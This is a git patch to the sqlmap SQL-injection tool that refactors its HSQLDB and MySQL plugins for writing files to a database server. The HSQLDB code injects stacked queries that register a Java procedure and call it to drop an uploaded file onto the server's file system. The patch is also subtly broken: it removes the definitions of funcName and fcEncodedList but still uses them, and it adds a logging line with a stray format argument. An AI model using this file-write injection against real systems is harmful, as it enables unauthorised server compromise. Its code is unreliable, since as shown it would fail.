From 0585a55ee035f124bfdb557d22a02472d6d83c41 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2020 11:05:13 +0200 Subject: [PATCH] Trivial refactoring for #4379 --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/filesystem.py | 22 +++++++++------------- plugins/dbms/mysql/filesystem.py | 2 +- 3 files changed, 11 insertions(+), 15 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3fba3a549..efe598298 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -18,7 +18,7 @@ from lib.core.enums import OS from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.4.10.4" +VERSION = "1.4.10.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index 1f72a0c6e..05161deb5 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -21,26 +21,23 @@ class Filesystem(GenericFilesystem): @stackedmethod def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): - funcName = randomStr() - MAX_BYTES = 2 ** 20 + max_bytes = 1024 * 1024 - debugMsg = "creating a Java Language Procedure '%s'" % funcName + debugMsg = "creating JLP procedure '%s'" % funcName logger.debug(debugMsg) - addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES) + addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes) addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL " addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'" inject.goStacked(addFuncQuery) - logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(localFile, "hex", True) fcEncodedStr = fcEncodedList[0][2:] fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "as the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" @@ -49,15 +46,14 @@ class Filesystem(GenericFilesystem): debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) logger.debug(debugMsg) - # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures - invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES) + # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures + invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes) inject.goStacked(invokeQuery) - logger.debug("removing procedure %s from DB" % funcName) - delQuery = "DELETE PROCEDURE " + funcName + logger.debug("cleaning up" % funcName) + delQuery = "DELETE PROCEDURE %s" % funcName inject.goStacked(delQuery) - message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile + message = "the local file '%s' has been written on the back-end DBMS" % localFile message += "file system ('%s')" % remoteFile logger.info(message) - diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index f92485a2c..5cbe946be 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -96,7 +96,7 @@ class Filesystem(GenericFilesystem): fcEncodedStrLen = len(fcEncodedStr) if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " + warnMsg = "as the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process"